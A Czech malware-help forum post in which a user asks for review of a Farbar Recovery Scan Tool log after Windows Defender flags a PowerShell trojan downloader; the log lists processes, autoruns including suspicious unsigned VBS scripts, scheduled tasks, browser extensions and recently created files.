VIRY.CZ

Pomáháme v boji s počítačovou havěti!
https://forum.viry.cz:443/

Prosím o kontrolu logu

https://forum.viry.cz:443/viewtopic.php?t=157810

Stránka 1 z 2

Prosím o kontrolu logu

Napsal: 20 led 2021 10:50
od chenny
Dobrý den, prosím o kontrolu logu. Po startu PC vyskočí chybová hláška a Windows Defender hlásí detekci viru Trojan Downloader PowerShell.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 07:13:34)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Appwork GmbH -> AppWork GmbH) C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\JDownloader2.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <12>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.11102.0_x64__8wekyb3d8bbwe\GameBar.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.11102.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mstsc.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1

Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-19]

FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-15]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-15]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]

Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-15]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 07:13 - 2021-01-20 07:14 - 000020784 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 07:13 - 2021-01-20 07:13 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 07:14 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 07:13 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\Program Files\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
